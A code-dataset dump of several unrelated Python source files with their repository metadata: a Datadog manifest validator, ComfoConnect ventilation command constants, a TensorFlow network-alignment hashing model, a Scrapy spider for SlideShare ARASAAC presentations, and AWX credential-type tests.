                    file_fixed = True
                else:
                    display_queue.append((echo_failure, output))
            else:
                all_guids[guid] = check_name
            # manifest_version
            correct_manifest_version = '1.0.0'
            manifest_version = decoded.get('manifest_version')
            version_parts = parse_version_parts(manifest_version)
            if len(version_parts) != 3:
                file_failures += 1
                if not manifest_version:
                    output = ' required non-null string: manifest_version'
                else:
                    output = f' invalid `manifest_version`: {manifest_version}'
                if fix:
                    version_parts = parse_version_parts(correct_manifest_version)
                    decoded['manifest_version'] = correct_manifest_version
                    display_queue.append((echo_warning, output))
                    display_queue.append((echo_success, f' new `manifest_version`: {correct_manifest_version}'))
                    file_failures -= 1
                    file_fixed = True
                else:
                    display_queue.append((echo_failure, output))
            if len(version_parts) == 3:
                # Modern manifests (>= 1.0.0) track the check version in
                # __about__.py, so a `version` field in the manifest is stale.
                about_exists = os.path.isfile(
                    os.path.join(root, check_name, 'datadog_checks', check_name, '__about__.py')
                )
                if version_parts >= [1, 0, 0]:
                    if 'version' in decoded and about_exists:
                        file_failures += 1
                        output = ' outdated field: version'
                        if fix:
                            del decoded['version']
                            display_queue.append((echo_warning, output))
                            display_queue.append((echo_success, ' removed field: version'))
                            file_failures -= 1
                            file_fixed = True
                        else:
                            display_queue.append((echo_failure, output))
                elif about_exists:
                    file_failures += 1
                    output = f' outdated `manifest_version`: {manifest_version}'
                    if fix:
                        decoded['manifest_version'] = correct_manifest_version
                        display_queue.append((echo_warning, output))
                        display_queue.append((echo_success, f' new `manifest_version`: {correct_manifest_version}'))
                        if 'version' in decoded:
                            del decoded['version']
                            display_queue.append((echo_success, ' removed field: version'))
                        file_failures -= 1
                        file_fixed = True
                    else:
                        display_queue.append((echo_failure, output))
            else:
                # Legacy manifests must at least declare a valid `version`.
                version = decoded.get('version')
                version_parts = parse_version_parts(version)
                if len(version_parts) != 3:
                    file_failures += 1
                    if not version:
                        display_queue.append((echo_failure, ' required non-null string: version'))
                    else:
                        display_queue.append((echo_failure, f' invalid `version`: {version}'))
            # maintainer
            if not is_extras and not is_marketplace:
                correct_maintainer = 'help@datadoghq.com'
                maintainer = decoded.get('maintainer')
                if maintainer != correct_maintainer:
                    file_failures += 1
                    output = f' incorrect `maintainer`: {maintainer}'
                    if fix:
                        decoded['maintainer'] = correct_maintainer
                        display_queue.append((echo_warning, output))
                        display_queue.append((echo_success, f' new `maintainer`: {correct_maintainer}'))
                        file_failures -= 1
                        file_fixed = True
                    else:
                        display_queue.append((echo_failure, output))
            # name
            correct_name = check_name
            name = decoded.get('name')
            if not isinstance(name, str) or name.lower() != correct_name.lower():
                file_failures += 1
                output = f' incorrect `name`: {name}'
                if fix:
                    decoded['name'] = correct_name
                    display_queue.append((echo_warning, output))
                    display_queue.append((echo_success, f' new `name`: {correct_name}'))
                    file_failures -= 1
                    file_fixed = True
                else:
                    display_queue.append((echo_failure, output))
            # metrics_metadata
            metadata_in_manifest = decoded.get('assets', {}).get('metrics_metadata')
            metadata_file_exists = os.path.isfile(get_metadata_file(check_name))
            if not metadata_in_manifest and metadata_file_exists:
                # There is a metadata.csv file but no entry in the manifest.json
                file_failures += 1
                display_queue.append((echo_failure, ' metadata.csv exists but not defined in the manifest.json'))
            elif metadata_in_manifest and not metadata_file_exists:
                # There is an entry in the manifest.json file but the referenced csv file does not exist.
                file_failures += 1
                display_queue.append(
                    (echo_failure, ' metrics_metadata in manifest.json references a non-existing file.')
                )
            # metric_to_check
            metric_to_check = decoded.get('metric_to_check')
            if metric_to_check:
                metrics_to_check = metric_to_check if isinstance(metric_to_check, list) else [metric_to_check]
                for metric in metrics_to_check:
                    metric_integration_check_name = check_name
                    # snmp vendor specific integrations define metric_to_check
                    # with metrics from `snmp` integration
                    if check_name.startswith('snmp_') and not metadata_in_manifest:
                        metric_integration_check_name = 'snmp'
                    if (
                        not is_metric_in_metadata_file(metric, metric_integration_check_name)
                        and metric not in METRIC_TO_CHECK_WHITELIST
                    ):
                        file_failures += 1
                        display_queue.append((echo_failure, f' metric_to_check not in metadata.csv: {metric!r}'))
            elif metadata_in_manifest and check_name != 'snmp' and not is_marketplace:
                # TODO remove exemptions for integrations-extras and marketplace in future
                # if we have a metadata.csv file but no `metric_to_check` raise an error
                metadata_file = get_metadata_file(check_name)
                if os.path.isfile(metadata_file):
                    for _, row in read_metadata_rows(metadata_file):
                        # there are cases of metadata.csv files with just a header but no metrics
                        if row:
                            file_failures += 1
                            display_queue.append((echo_failure, ' metric_to_check not included in manifest.json'))
                            break
            # support
            if is_extras:
                correct_support = 'contrib'
            elif is_marketplace:
                correct_support = 'partner'
            else:
                correct_support = 'core'
            support = decoded.get('support')
            if support != correct_support:
                file_failures += 1
                output = f' incorrect `support`: {support}'
                if fix:
                    decoded['support'] = correct_support
                    display_queue.append((echo_warning, output))
                    display_queue.append((echo_success, f' new `support`: {correct_support}'))
                    file_failures -= 1
                    file_fixed = True
                else:
                    display_queue.append((echo_failure, output))
            # is_public
            correct_is_public = True
            is_public = decoded.get('is_public')
            if not isinstance(is_public, bool):
                file_failures += 1
                output = ' required boolean: is_public'
                if fix:
                    decoded['is_public'] = correct_is_public
                    display_queue.append((echo_warning, output))
                    display_queue.append((echo_success, f' new `is_public`: {correct_is_public}'))
                    file_failures -= 1
                    file_fixed = True
                else:
                    display_queue.append((echo_failure, output))
            # Ensure attributes haven't changed
            # Skip if the manifest is a new file (i.e. new integration)
            manifest_fields_changed = content_changed(file_glob=f"{check_name}/manifest.json")
            if 'new file' not in manifest_fields_changed:
                for field in FIELDS_NOT_ALLOWED_TO_CHANGE:
                    if field in manifest_fields_changed:
                        output = f'Attribute `{field}` is not allowed to be modified. Please revert to original value'
                        file_failures += 1
                        display_queue.append((echo_failure, output))
            else:
                display_queue.append(
                    (echo_info, " skipping check for changed fields: integration not on default branch")
                )
            if file_failures > 0:
                failed_checks += 1
                # Display detailed info if file invalid
                echo_info(f"{check_name}/manifest.json... ", nl=False)
                echo_failure("FAILED")
                for display_func, message in display_queue:
                    display_func(message)
            elif not file_fixed:
                ok_checks += 1
            if fix and file_fixed:
                new_manifest = f"{json.dumps(decoded, indent=2, separators=(',', ': '))}\n"
                write_file(manifest_file, new_manifest)
                # Display detailed info if file has been completely fixed
                if file_failures == 0:
                    fixed_checks += 1
                    echo_info(f"{check_name}/manifest.json... ", nl=False)
                    echo_success("FIXED")
                    for display_func, message in display_queue:
                        display_func(message)
    if ok_checks:
        echo_success(f"{ok_checks} valid files")
    if fixed_checks:
        echo_info(f"{fixed_checks} fixed files")
    if failed_checks:
        echo_failure(f"{failed_checks} invalid files")
        abort()
| 46.697232
| 120
| 0.437961
|
4a0f22dd6009e06d952e7ae241f06dee88b5e406
| 3,661
|
py
|
Python
|
bin/pycomfoconnect/const.py
|
blacksun80/LoxBerry-Plugin-Comfoconnect
|
96d27074b297f6d8540fc28b7f14d68618b36f61
|
[
"Apache-2.0"
] | 2
|
2021-07-13T07:33:14.000Z
|
2021-07-23T20:15:48.000Z
|
bin/pycomfoconnect/const.py
|
blacksun80/LoxBerry-Plugin-Comfoconnect
|
96d27074b297f6d8540fc28b7f14d68618b36f61
|
[
"Apache-2.0"
] | 2
|
2021-07-23T20:12:14.000Z
|
2021-07-23T20:13:44.000Z
|
bin/pycomfoconnect/const.py
|
blacksun80/LoxBerry-Plugin-Comfoconnect
|
96d27074b297f6d8540fc28b7f14d68618b36f61
|
[
"Apache-2.0"
] | 1
|
2021-07-23T18:23:56.000Z
|
2021-07-23T18:23:56.000Z
|
# API constants
# Fan speed mode names exposed by the API.
FAN_MODE_AWAY = 'away'
FAN_MODE_LOW = 'low'
FAN_MODE_MEDIUM = 'medium'
FAN_MODE_HIGH = 'high'
# Commands
# Raw command payloads sent to the ventilation unit over the bridge.
CMD_FAN_MODE_AWAY = b'\x84\x15\x01\x01\x00\x00\x00\x00\x01\x00\x00\x00\x00'
CMD_FAN_MODE_LOW = b'\x84\x15\x01\x01\x00\x00\x00\x00\x01\x00\x00\x00\x01'
CMD_FAN_MODE_MEDIUM = b'\x84\x15\x01\x01\x00\x00\x00\x00\x01\x00\x00\x00\x02'
CMD_FAN_MODE_HIGH = b'\x84\x15\x01\x01\x00\x00\x00\x00\x01\x00\x00\x00\x03'
CMD_MODE_AUTO = b'\x85\x15\x08\x01' #AUTO !!!
CMD_MODE_MANUAL = b'\x84\x15\x08\x01\x00\x00\x00\x00\x01\x00\x00\x00\x01' # MANUAL !!!
CMD_START_SUPPLY_FAN = b'\x85\x15\x07\x01'
CMD_START_EXHAUST_FAN = b'\x85\x15\x06\x01'
# Temperature profile selection.
CMD_TEMPPROF_NORMAL = b'\x84\x15\x03\x01\x00\x00\x00\x00\xff\xff\xff\xff\x00'
CMD_TEMPPROF_COOL = b'\x84\x15\x03\x01\x00\x00\x00\x00\xff\xff\xff\xff\x01'
CMD_TEMPPROF_WARM = b'\x84\x15\x03\x01\x00\x00\x00\x00\xff\xff\xff\xff\x02'
# Bypass control.
CMD_BYPASS_ON = b'\x84\x15\x02\x01\x00\x00\x00\x00\x10\x0e\x00\x00\x01'
CMD_BYPASS_OFF = b'\x84\x15\x02\x01\x00\x00\x00\x00\x10\x0e\x00\x00\x02'
CMD_BYPASS_AUTO = b'\x85\x15\x02\x01'
# Sensor ventilation toggles (temperature / humidity comfort / humidity protection).
CMD_SENSOR_TEMP_OFF = b'\x03\x1d\x01\x04\x00'
CMD_SENSOR_TEMP_AUTO = b'\x03\x1d\x01\x04\x01'
CMD_SENSOR_TEMP_ON = b'\x03\x1d\x01\x04\x02'
CMD_SENSOR_HUMC_OFF = b'\x03\x1d\x01\x06\x00'
CMD_SENSOR_HUMC_AUTO = b'\x03\x1d\x01\x06\x01'
CMD_SENSOR_HUMC_ON = b'\x03\x1d\x01\x06\x02'
CMD_SENSOR_HUMP_OFF = b'\x03\x1d\x01\x07\x00'
CMD_SENSOR_HUMP_AUTO = b'\x03\x1d\x01\x07\x01'
CMD_SENSOR_HUMP_ON = b'\x03\x1d\x01\x07\x02'
CMD_READ_CONFIG = b'\x87\x15\x01'
CMD_READ_HRU = b'\x01\x01\x01\x10\x08'
CMD_BOOST_MODE_END = b'\x85\x15\x01\x06'
# Sensor locations
# Numeric sensor ids used when subscribing to unit telemetry.
SENSOR_AWAY = 16
SENSOR_OPERATING_MODE_BIS = 49
SENSOR_OPERATING_MODE = 56
SENSOR_FAN_SPEED_MODE = 65
SENSOR_BYPASS_MODE = 66
SENSOR_PROFILE_TEMPERATURE = 67
SENSOR_FAN_MODE_SUPPLY = 70
SENSOR_FAN_MODE_EXHAUST = 71
SENSOR_FAN_TIME = 81
SENSOR_BYPASS_TIME = 82
SENSOR_SUPPLY_TIME = 86
SENSOR_EXHAUST_TIME = 87
SENSOR_FAN_EXHAUST_DUTY = 117
SENSOR_FAN_SUPPLY_DUTY = 118
SENSOR_FAN_SUPPLY_FLOW = 119
# NOTE(review): name keeps the original spelling ("EXHAUS") — renaming would
# break existing callers.
SENSOR_FAN_EXHAUS_FLOW = 120
SENSOR_FAN_EXHAUST_SPEED = 121
SENSOR_FAN_SUPPLY_SPEED = 122
SENSOR_POWER_CURRENT = 128
SENSOR_POWER_TOTAL_YEAR = 129
SENSOR_POWER_TOTAL = 130
SENSOR_PREHEATER_POWER_TOTAL_YEAR = 144
SENSOR_PREHEATER_POWER_TOTAL = 145
SENSOR_PREHEATER_POWER_CURRENT = 146
SENSOR_SETTING_RF_PAIRING = 176
SENSOR_DAYS_TO_REPLACE_FILTER = 192
SENSOR_CURRENT_RMOT = 209
SENSOR_HEATING_SEASON = 210
SENSOR_COOLING_SEASON = 211
SENSOR_TARGET_TEMPERATURE = 212
SENSOR_AVOIDED_HEATING_CURRENT = 213
SENSOR_AVOIDED_HEATING_TOTAL_YEAR = 214
SENSOR_AVOIDED_HEATING_TOTAL = 215
SENSOR_AVOIDED_COOLING_CURRENT = 216
SENSOR_AVOIDED_COOLING_YEAR = 217
SENSOR_AVOIDED_COOLING_TOTAL = 218
SENSOR_AVOIDED_COOLING_CURRENT_TARGET = 219
SENSOR_TEMPERATURE_SUPPLY = 221
SENSOR_COMFORTCONTROL_MODE = 225
SENSOR_BYPASS_STATE = 227
SENSOR_FROSTPROTECTION_UNBALANCE = 228
SENSOR_TEMPERATURE_EXTRACT = 274
SENSOR_TEMPERATURE_EXHAUST = 275
SENSOR_TEMPERATURE_OUTDOOR = 276
SENSOR_TEMPERATURE_AFTER_PREHEATER = 277
SENSOR_HUMIDITY_EXTRACT = 290
SENSOR_HUMIDITY_EXHAUST = 291
SENSOR_HUMIDITY_OUTDOOR = 292
SENSOR_HUMIDITY_AFTER_PREHEATER = 293
SENSOR_HUMIDITY_SUPPLY = 294
| 42.08046
| 108
| 0.696531
|
4a0f23f95b337eb31165efdf48d018b00ec43353
| 10,956
|
py
|
Python
|
src/lib_dcnh/dcn_neg_share_params.py
|
Allen517/dcnh
|
45eb1b6acd4353e082983772c3a357a01e9ff7f8
|
[
"BSD-4-Clause"
] | null | null | null |
src/lib_dcnh/dcn_neg_share_params.py
|
Allen517/dcnh
|
45eb1b6acd4353e082983772c3a357a01e9ff7f8
|
[
"BSD-4-Clause"
] | null | null | null |
src/lib_dcnh/dcn_neg_share_params.py
|
Allen517/dcnh
|
45eb1b6acd4353e082983772c3a357a01e9ff7f8
|
[
"BSD-4-Clause"
] | null | null | null |
# -*- coding:utf8 -*-
import random
import tensorflow as tf
import numpy as np
import os,sys
from utils.LogHandler import LogHandler
from utils.utils import load_train_valid_labels, batch_iter, valid_iter, read_embeddings
class DCN_SP(object):
def __init__(self, learning_rate, batch_size, neg_ratio, n_input, n_out, n_hidden, n_layer
, device, files, log_file):
if os.path.exists('log/'+log_file+'.log'):
os.remove('log/'+log_file+'.log')
self.logger = LogHandler(log_file)
self.device = device
# Parameters
self.learning_rate = learning_rate
self.batch_size = batch_size
self.neg_ratio = neg_ratio
self.valid_prop = .9
self.valid_sample_size = 9
self.gamma = 1
self.eta = 0
self.cur_epoch = 1
# Network Parameters
self.n_hidden = n_hidden # number of neurons in hidden layer
self.n_input = n_input # size of node embeddings
self.n_out = n_out # hashing code
self.n_layer = n_layer # number of layer
# Set Train Data
if not isinstance(files, list) and len(files)<3:
self.logger.info('The alogrihtm needs files like [First Graph File, Second Graph File, Label File]')
return
# tf Graph input
self.lookup_f = dict()
self.lookup_g = dict()
self.look_back_f = list()
self.look_back_g = list()
self._read_train_dat(files[0], files[1], files[2]) # douban, weibo, label files
self.valid_sample_size = min(min(self.valid_sample_size, len(self.look_back_f)-1), len(self.look_back_g)-1)
# TF Graph Building
self.sess = tf.Session()
cur_seed = random.getrandbits(32)
initializer = tf.contrib.layers.xavier_initializer(uniform=False, seed=cur_seed)
with tf.device(self.device):
with tf.variable_scope("model", reuse=None, initializer=initializer):
self.mlp_weights()
self.build_graph()
self.build_valid_graph()
self.sess.run(tf.global_variables_initializer())
def _read_train_dat(self, embed1_file, embed2_file, label_file):
self.L = load_train_valid_labels(label_file, self.valid_prop)
self.F, self.lookup_f, self.look_back_f = read_embeddings(embed1_file, self.lookup_f, self.look_back_f)
self.G, self.lookup_g, self.look_back_g = read_embeddings(embed2_file, self.lookup_g, self.look_back_g)
def mlp_weights(self):
# Store layers weight & bias
self.weights = dict()
self.biases = dict()
self.weights['h0_f'] = tf.Variable(tf.random_normal([self.n_input, self.n_hidden]))
self.weights['h0_g'] = tf.Variable(tf.random_normal([self.n_input, self.n_hidden]))
self.biases['b0_f'] = tf.Variable(tf.zeros([self.n_hidden]))
self.biases['b0_g'] = tf.Variable(tf.zeros([self.n_hidden]))
for i in range(1,self.n_layer):
self.weights['h{}'.format(i)] = tf.Variable(tf.random_normal([self.n_hidden, self.n_hidden]))
self.biases['b{}'.format(i)] = tf.Variable(tf.zeros([self.n_hidden]))
self.weights['out'] = tf.Variable(tf.random_normal([self.n_hidden, self.n_out]))
self.biases['b_out'] = tf.Variable(tf.zeros([self.n_out]))
def build_code_graph(self, inputs, tag):
# Input layer
layer = tf.nn.sigmoid(tf.add(tf.matmul(tf.reshape(inputs,[-1,self.n_input]), self.weights['h0_'+tag])
, self.biases['b0_'+tag]))
for i in range(1,self.n_layer):
layer = tf.nn.sigmoid(tf.add(tf.matmul(layer, self.weights['h{}'.format(i)])
, self.biases['b{}'.format(i)]))
# Output fully connected layer with a neuron
code = tf.nn.tanh(tf.matmul(layer, self.weights['out']) + self.biases['b_out'])
return code
def build_lin_code_graph(self, inputs, tag):
# Output fully connected layer with a neuron
code = tf.nn.tanh(tf.matmul(tf.reshape(inputs,[-1,self.n_input]), self.weights['out']) + self.biases['b_out'])
return code
def build_train_graph(self, src_tag, obj_tag):
PF = self.build_code_graph(self.pos_src_inputs, src_tag) # batch_size*n_out
PG = self.build_code_graph(self.pos_obj_inputs, obj_tag) # batch_size*n_out
NF = tf.reshape(
self.build_code_graph(self.neg_src_inputs, src_tag)
, [-1, self.neg_ratio, self.n_out]
) # batch_size*neg_ratio*n_out
NG = tf.reshape(
self.build_code_graph(self.neg_obj_inputs, obj_tag)
, [-1, self.neg_ratio, self.n_out]
) # batch_size*neg_ratio*n_out
# B = tf.sign(PF+PG) # batch_size*n_out
# self.ph['B'] = tf.sign(self.ph['F']+self.ph['G']) # batch_size*n_out
# train loss
term1_first = tf.log(tf.nn.sigmoid(tf.reduce_sum(.5*tf.multiply(PF, PG),axis=1)))
term1_second = tf.reduce_sum(tf.log(1-tf.nn.sigmoid(tf.reduce_sum(.5*tf.multiply(NF, NG),axis=2))),axis=1)
term1 = -tf.reduce_sum(term1_first+term1_second)
# term2 = tf.reduce_sum(tf.pow((B-PF),2))+tf.reduce_sum(tf.pow((B-PG),2))
term3 = tf.reduce_sum(tf.reduce_sum(tf.pow(PF,2))+tf.reduce_sum(tf.pow(PG,2), axis=1))
# term1 = -tf.reduce_sum(tf.multiply(self.ph['S'], theta)-tf.log(1+tf.exp(theta)))
# term2 = tf.reduce_sum(tf.norm(self.ph['B']-self.ph['F'],axis=1))+tf.reduce_sum(tf.norm(self.ph['B']-self.ph['G'],axis=1))
# term3 = tf.reduce_sum(tf.norm(self.ph['F'],axis=1))+tf.reduce_sum(tf.norm(self.ph['G'],axis=1))
return (term1+self.eta*term3)/self.cur_batch_size
def build_graph(self):
self.cur_batch_size = tf.placeholder('float32', name='batch_size')
self.pos_src_inputs = tf.placeholder('float32', [None, self.n_input])
self.pos_obj_inputs = tf.placeholder('float32', [None, self.n_input])
self.neg_src_inputs = tf.placeholder('float32', [None, self.neg_ratio, self.n_input])
self.neg_obj_inputs = tf.placeholder('float32', [None, self.neg_ratio, self.n_input])
self.loss_f2g = self.build_train_graph('f', 'g')
self.loss_g2f = self.build_train_graph('g', 'f')
# self.loss = (term1+self.eta*term3)/self.cur_batch_size
optimizer = tf.train.AdamOptimizer(self.learning_rate)
self.train_op_f2g = optimizer.minimize(self.loss_f2g)
self.train_op_g2f = optimizer.minimize(self.loss_g2f)
def build_valid_graph(self):
# validation
self.valid_f_inputs = tf.placeholder('float32', [None, self.valid_sample_size, self.n_input])
self.valid_g_inputs = tf.placeholder('float32', [None, self.valid_sample_size, self.n_input])
valid_f = tf.reshape(
self.build_code_graph(self.valid_f_inputs, 'f')
, [-1, self.valid_sample_size, self.n_out]
) # batch_size*neg_ratio*n_out
valid_g = tf.reshape(
self.build_code_graph(self.valid_g_inputs, 'g')
, [-1, self.valid_sample_size, self.n_out]
) # batch_size*neg_ratio*n_out
self.dot_dist = tf.reduce_sum(tf.multiply(valid_f, valid_g),axis=2)
# self.hamming_dist = -tf.reduce_sum(
# tf.clip_by_value(tf.sign(tf.multiply(valid_f,valid_g)),-1.,0.)
# , axis=2
# )
def train_one_epoch(self):
sum_loss = 0.0
# train process
batches_f2g = list(batch_iter(self.L, self.batch_size, self.neg_ratio\
, self.lookup_f, self.lookup_g, 'f', 'g'))
batches_g2f = list(batch_iter(self.L, self.batch_size, self.neg_ratio\
, self.lookup_g, self.lookup_f, 'g', 'f'))
n_batches = min(len(batches_f2g), len(batches_g2f))
batch_id = 0
for i in range(n_batches):
# training the process from network f to network g
pos_src_f2g,pos_obj_f2g,neg_src_f2g,neg_obj_f2g = batches_f2g[i]
if not len(pos_src_f2g)==len(pos_obj_f2g) and not len(neg_src_f2g)==len(neg_obj_f2g):
self.logger.info('The input label file goes wrong as the file format.')
continue
batch_size_f2g = len(pos_src_f2g)
feed_dict = {
self.pos_src_inputs:self.F[pos_src_f2g,:],
self.pos_obj_inputs:self.G[pos_obj_f2g,:],
self.neg_src_inputs:self.F[neg_src_f2g,:],
self.neg_obj_inputs:self.G[neg_obj_f2g,:],
self.cur_batch_size:batch_size_f2g
}
_, cur_loss_f2g = self.sess.run([self.train_op_f2g, self.loss_f2g],feed_dict)
sum_loss += cur_loss_f2g
# training the process from network g to network f
pos_src_g2f,pos_obj_g2f,neg_src_g2f,neg_obj_g2f = batches_g2f[i]
if not len(pos_src_g2f)==len(pos_obj_g2f) and not len(neg_src_g2f)==len(neg_obj_g2f):
self.logger.info('The input label file goes wrong as the file format.')
continue
batch_size_g2f = len(pos_src_g2f)
feed_dict = {
self.pos_src_inputs:self.G[pos_src_g2f,:],
self.pos_obj_inputs:self.F[pos_obj_g2f,:],
self.neg_src_inputs:self.G[neg_src_g2f,:],
self.neg_obj_inputs:self.F[neg_obj_g2f,:],
self.cur_batch_size:batch_size_g2f
}
_, cur_loss_g2f = self.sess.run([self.train_op_g2f, self.loss_g2f],feed_dict)
sum_loss += cur_loss_g2f
batch_id += 1
break
# valid process
valid_f, valid_g = valid_iter(self.L, self.valid_sample_size, self.lookup_f, self.lookup_g, 'f', 'g')
# print valid_f,valid_g
if not len(valid_f)==len(valid_g):
self.logger.info('The input label file goes wrong as the file format.')
return
valid_size = len(valid_f)
feed_dict = {
self.valid_f_inputs:self.F[valid_f,:],
self.valid_g_inputs:self.G[valid_g,:],
}
valid_dist = self.sess.run(self.dot_dist,feed_dict)
# valid_dist = self.sess.run(self.hamming_dist,feed_dict)
mrr = .0
for i in range(valid_size):
fst_dist = valid_dist[i][0]
pos = 1
for k in range(1,len(valid_dist[i])):
if fst_dist<=valid_dist[i][k]:
pos+=1
# print pos
# self.logger.info('dist:{},pos:{}'.format(fst_dist,pos))
# print valid_dist[i]
mrr += 1./pos
self.logger.info('Epoch={}, sum of loss={!s}, mrr={}'
.format(self.cur_epoch, sum_loss/batch_id/2, mrr/valid_size))
# print 'mrr:',mrr/valid_size
# self.logger.info('Epoch={}, sum of loss={!s}, valid_loss={}'
# .format(self.cur_epoch, sum_loss/batch_id, valid_loss))
self.cur_epoch += 1
def _write_in_file(self, filename, vec, tag):
with open(filename, 'aw') as res_handler:
if len(vec.shape)>1:
column_size = vec.shape[1]
else:
column_size = 1
reshape_vec = vec.reshape(-1)
vec_size = len(reshape_vec)
res_handler.write(tag+'\n')
for i in range(0,vec_size,column_size):
res_handler.write('{}\n'.format(' '.join([str(reshape_vec[i+k]) for k in range(column_size)])))
def save_models(self, filename):
if os.path.exists(filename):
os.remove(filename)
for k,v in self.weights.iteritems():
self._write_in_file(filename, v.eval(self.sess), k)
for k,v in self.biases.iteritems():
self._write_in_file(filename, v.eval(self.sess), k)
if __name__ == '__main__':
res_file = 'res_file'
# SAVING_STEP = 1
# MAF_EPOCHS = 21
# model = DCNH(learning_rate=0.1, batch_size=4, neg_ratio=3, n_input=4, n_out=2, n_hidden=3
# ,files=['tmp_res.node_embeddings_src', 'tmp_res.node_embeddings_obj', 'data/test.align'])
SAVING_STEP = 10
MAF_EPOCHS = 20001
model = DCNH_SP(learning_rate=0.01, batch_size=128, neg_ratio=5, n_input=256, n_out=32, n_hidden=32, n_layer=2
,files=['douban_all.txt', 'weibo_all.txt', 'douban_weibo.identity.users.final.p0dot8']
,log_file='DCNH_SP'
,device=':/gpu:0')
for i in range(MAF_EPOCHS):
model.train_one_epoch()
if i>0 and i%SAVING_STEP==0:
model.save_models(res_file+'.epoch_'+str(i))
| 39.268817
| 125
| 0.704728
|
4a0f2575441d7b78c283d2ee592c1a37766b8c9f
| 3,261
|
py
|
Python
|
slideshare/spiders/arasaac.py
|
lmorillas/recursoscaa
|
bac2ff39d67028ca8d4969d23f5061f09be59a0e
|
[
"Apache-2.0"
] | null | null | null |
slideshare/spiders/arasaac.py
|
lmorillas/recursoscaa
|
bac2ff39d67028ca8d4969d23f5061f09be59a0e
|
[
"Apache-2.0"
] | null | null | null |
slideshare/spiders/arasaac.py
|
lmorillas/recursoscaa
|
bac2ff39d67028ca8d4969d23f5061f09be59a0e
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import scrapy
from urlparse import urljoin, urlparse
from slideshare.items import SlideshareItem
import json
BASE = 'http://es.slideshare.net/'
historico = json.load(open('historico.json'))
urls = [h.get('url') for h in historico]
class ArasaacSpider(scrapy.Spider):
name = "arasaac"
allowed_domains = ["slideshare.net"]
_urlbase = "http://es.slideshare.net/search/slideshow?ft=all&lang=**&page={}&q=arasaac&qid=c379a98f-bffa-47f9-8c4e-0bfc6c9efb7d&searchfrom=header&sort=&ud=month"
#_urlbase2 = 'http://es.slideshare.net/search/slideshow?lang=es&page={}&q=arasaac&sort=relevance'
#_urlbase = 'http://es.slideshare.net/search/slideshow?ft=all&lang=%2A%2A&page={}&q=arasaac&qid=4941c245-759a-431d-9672-a730e03eb500&searchfrom=header&sort=&ud=year'
start_urls = [
'http://es.slideshare.net/search/slideshow?searchfrom=header&q=arasaac',
]
start_urls.extend([_urlbase.format(x) for x in range(1, 10)])
#start_urls.extend([_urlbase2.format(x) for x in range(1, 300)])
parsed = []
def extract(self, dato, path):
x = self.sel.xpath(path)
if x:
self.item[dato] = x[0].extract().strip()
def parse(self, response):
if urlparse(response.url).path in urls:
return
if 'slideshare.net/search/' in response.url:
siguientes = response.selector.xpath(u'//a[contains(@class, "iso_slideshow_link")]/@href').extract()
for s in siguientes:
path = urlparse(s).path
if path not in self.parsed and path not in urls:
self.parsed.append(path)
yield scrapy.Request(urljoin(BASE, path))
else:
self.sel = response.selector
self.item = SlideshareItem()
path = urlparse(response.url).path
# item['url'] = path
self.item['url'] = path
self.extract('autor', '//a[@class="j-author-name"]/text()')
self.extract('label', '//h1[@itemprop="headline"]/text()')
# self.extract('fecha', '//time[@itemprop="datePublished"]/text()')
self.extract('fecha', '//time[@datetime]/@datetime')
if self.item['fecha']:
self.item['fecha'] = self.item['fecha'][:10]
self.extract('desc', '//p[contains(@class, "j-desc-expand")]/text()')
if not self.item.get('desc'):
self.extract('desc', '//div[contains(@class, "j-desc-more")]/text()')
src_imagen = self.sel.xpath('//img[contains(@class, "slide_image")]/@src')
if src_imagen:
self.item['imagen'] = urlparse(src_imagen[0].extract()).path
else:
self.extract('imagen', '//meta[@itemprop="thumbnailUrl"]/@content')
self.extract('lang', '//meta[@itemprop="inLanguage"]/@content')
if self.item['lang'] == '' or '*' in self.item['lang'] \
or '!!' in self.item['lang']:
self.item['lang'] = 'es'
self.extract('plays', '//meta[@name="slideshow_view_count"]/@content')
if self.item.get('plays'):
self.item['plays'] = int(self.item['plays'])
yield self.item
| 41.807692
| 169
| 0.579577
|
4a0f25aa30af5f56aabcff2ccb280fadb885d36f
| 2,031
|
py
|
Python
|
awx_collection/test/awx/test_credential_type.py
|
DamoR25/awxnew
|
03ed6e97558ae090ea52703caf6ed1b196557981
|
[
"Apache-2.0"
] | 11,396
|
2017-09-07T04:56:02.000Z
|
2022-03-31T13:56:17.000Z
|
awx_collection/test/awx/test_credential_type.py
|
DamoR25/awxnew
|
03ed6e97558ae090ea52703caf6ed1b196557981
|
[
"Apache-2.0"
] | 11,046
|
2017-09-07T09:30:46.000Z
|
2022-03-31T20:28:01.000Z
|
awx_collection/test/awx/test_credential_type.py
|
DamoR25/awxnew
|
03ed6e97558ae090ea52703caf6ed1b196557981
|
[
"Apache-2.0"
] | 3,592
|
2017-09-07T04:14:31.000Z
|
2022-03-31T23:53:09.000Z
|
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import pytest
from awx.main.models import CredentialType
@pytest.mark.django_db
def test_create_custom_credential_type(run_module, admin_user, silence_deprecation):
# Example from docs
result = run_module(
'credential_type',
dict(
name='Nexus',
description='Credentials type for Nexus',
kind='cloud',
inputs={"fields": [{"id": "server", "type": "string", "default": "", "label": ""}], "required": []},
injectors={'extra_vars': {'nexus_credential': 'test'}},
state='present',
),
admin_user,
)
assert not result.get('failed', False), result.get('msg', result)
assert result.get('changed'), result
ct = CredentialType.objects.get(name='Nexus')
assert result['name'] == 'Nexus'
assert result['id'] == ct.pk
assert ct.inputs == {"fields": [{"id": "server", "type": "string", "default": "", "label": ""}], "required": []}
assert ct.injectors == {'extra_vars': {'nexus_credential': 'test'}}
@pytest.mark.django_db
def test_changed_false_with_api_changes(run_module, admin_user):
result = run_module(
'credential_type',
dict(
name='foo',
kind='cloud',
inputs={"fields": [{"id": "env_value", "label": "foo", "default": "foo"}]},
injectors={'env': {'TEST_ENV_VAR': '{{ env_value }}'}},
),
admin_user,
)
assert not result.get('failed', False), result.get('msg', result)
assert result.get('changed'), result
result = run_module(
'credential_type',
dict(
name='foo',
inputs={"fields": [{"id": "env_value", "label": "foo", "default": "foo"}]},
injectors={'env': {'TEST_ENV_VAR': '{{ env_value }}'}},
),
admin_user,
)
assert not result.get('failed', False), result.get('msg', result)
assert not result.get('changed'), result
| 32.238095
| 116
| 0.579025
|
4a0f26276caebec326dfb89fccd3026a49facde8
| 6,925
|
py
|
Python
|
North Atlantic/Particle Tracking/NorthAtlanticStokeTotalTracking.py
|
OceanParcels/SKIM-garbagepatchlocations
|
3c028e3ceba902ff79f52e31b83bed811bde1133
|
[
"MIT"
] | 1
|
2021-07-13T12:55:20.000Z
|
